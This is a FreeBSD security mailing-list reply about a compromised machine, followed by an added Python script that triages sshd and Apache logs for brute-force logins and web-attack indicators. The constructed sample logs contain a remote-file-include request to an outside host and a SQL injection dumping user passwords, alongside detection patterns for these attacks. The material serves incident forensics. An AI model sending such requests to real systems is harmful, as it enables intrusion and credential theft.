From: Jan Muenther <jan.muenther@nruns.com>
To: freebsd-security@freebsd.org
Date: Sat, 27 Nov 2010 14:17:17 +0100
Subject: Re: ssh binary modified
In-Reply-To: <20101127075543.f4539aec.wmoran@collaborativefusion.com>

Hello,

yeah, that box has been taken over. Now, before you nuke it and reinstall from some trusted media, I'd try and give finding out what exactly happened a shot.

My point is that if they got in through e.g. a flaw in a custom web app, just newly setting up the machine and resetting the passwords is not going to make it all go away. You don't have to be a forensics expert to at least have a good long look at the log files.

Cheers, Jan
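Editor's note, added example (not part of Jan's mail, the thread, or any FreeBSD code): the "look at the log files" advice above, turned into a small triage script. It parses sshd lines in the FreeBSD /var/log/auth.log format and Apache combined-format access lines for the custom web app, flags accepted ssh logins that deserve attention (success after failures from the same source, unknown source, root login), flags a few heuristic web-attack indicators, and correlates the two so you can see whether the host that hit the web app is the one that later logged in over ssh. All log lines, hostnames, addresses and paths below are constructed samples, and the allowlist of administrator sources is an assumption you would replace with your own.

```python
"""Log triage for a box whose ssh binary has been replaced: where did they get in?
Added example, not code from the original mail or from FreeBSD. All log lines,
hosts, addresses and paths are constructed samples."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample of /var/log/auth.log (FreeBSD syslog format, sshd lines only).
AUTH_LOG = """\
Nov 25 02:11:03 www sshd[1402]: Accepted publickey for wmoran from 192.0.2.10 port 50211 ssh2
Nov 26 03:40:11 www sshd[2210]: Failed password for invalid user admin from 198.51.100.7 port 40122 ssh2
Nov 26 03:40:14 www sshd[2212]: Failed password for root from 198.51.100.7 port 40130 ssh2
Nov 26 03:40:19 www sshd[2214]: Failed password for root from 198.51.100.7 port 40141 ssh2
Nov 26 03:40:25 www sshd[2216]: Accepted password for root from 198.51.100.7 port 40150 ssh2
Nov 26 03:42:07 www sshd[2301]: Accepted password for www from 203.0.113.5 port 61002 ssh2
"""

# Constructed sample of an Apache combined-format access log for the custom web app.
ACCESS_LOG = """\
203.0.113.5 - - [26/Nov/2010:03:30:02 +0000] "GET /app/index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Nov/2010:03:30:41 +0000] "GET /app/index.php?page=http://198.51.100.7/c.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Nov/2010:03:31:10 +0000] "GET /app/view.php?id=1%20UNION%20SELECT%20user,password%20FROM%20users HTTP/1.1" 200 9810 "-" "Mozilla/5.0"
192.0.2.10 - - [26/Nov/2010:09:00:00 +0000] "GET /app/index.php?page=about HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Assumed allowlist of source addresses the administrators normally log in from.
KNOWN_ADMIN_SOURCES = {"192.0.2.10"}

SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic indicators, applied to the URL-decoded request path and query string.
WEB_INDICATORS = {
    "remote file include": re.compile(r"[?&]\w+=https?://", re.I),
    "sql injection": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "path traversal": re.compile(r"\.\./"),
}


def parse_sshd(log_text):
    """Return one dict (result, method, user, src) per sshd Accepted/Failed line, in log order."""
    return [m.groupdict() for m in map(SSHD_RE.search, log_text.splitlines()) if m]


def suspicious_logins(events, known_sources):
    """Return [(event, reasons)] for accepted logins worth a close look.
    Failures are counted per source as we go, so a success that follows failures
    from the same address is reported as a brute force that worked."""
    failures = defaultdict(int)
    flagged = []
    for ev in events:
        if ev["result"] == "Failed":
            failures[ev["src"]] += 1
            continue
        reasons = []
        if failures[ev["src"]]:
            reasons.append("success after %d failures" % failures[ev["src"]])
        if ev["src"] not in known_sources:
            reasons.append("unknown source")
        if ev["user"] == "root":
            reasons.append("root login")
        if reasons:
            flagged.append((ev, reasons))
    return flagged


def web_attack_hits(log_text):
    """Return [(indicator, src, decoded_url)] for access-log requests matching an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        url = unquote(m.group("url"))
        for name, rx in WEB_INDICATORS.items():
            if rx.search(url):
                hits.append((name, m.group("src"), url))
    return hits


def correlate(flagged, hits):
    """Sources that both attacked the web app and later logged in over ssh."""
    web_sources = {src for _, src, _ in hits}
    return {ev["src"] for ev, _ in flagged if ev["src"] in web_sources}


if __name__ == "__main__":
    flagged = suspicious_logins(parse_sshd(AUTH_LOG), KNOWN_ADMIN_SOURCES)
    hits = web_attack_hits(ACCESS_LOG)
    for ev, reasons in flagged:
        print("ssh: %s as %s via %s: %s" % (ev["src"], ev["user"], ev["method"], ", ".join(reasons)))
    for name, src, url in hits:
        print("web: %s from %s: %s" % (name, src, url))
    print("web attacker(s) that also got an ssh login:", correlate(flagged, hits))
```

On the constructed data the script shows two separate stories: a password brute force from 198.51.100.7 that ended in a root login, and 203.0.113.5 probing the web app (remote file include, then a UNION SELECT) half an hour before it logged in over ssh as the web server's user. Only the second one would survive a reinstall plus password reset, which is the point of the mail. Run it against the real logs on the compromised disk mounted read-only from a clean system, since logs on a box with a modified ssh binary may have been edited as well.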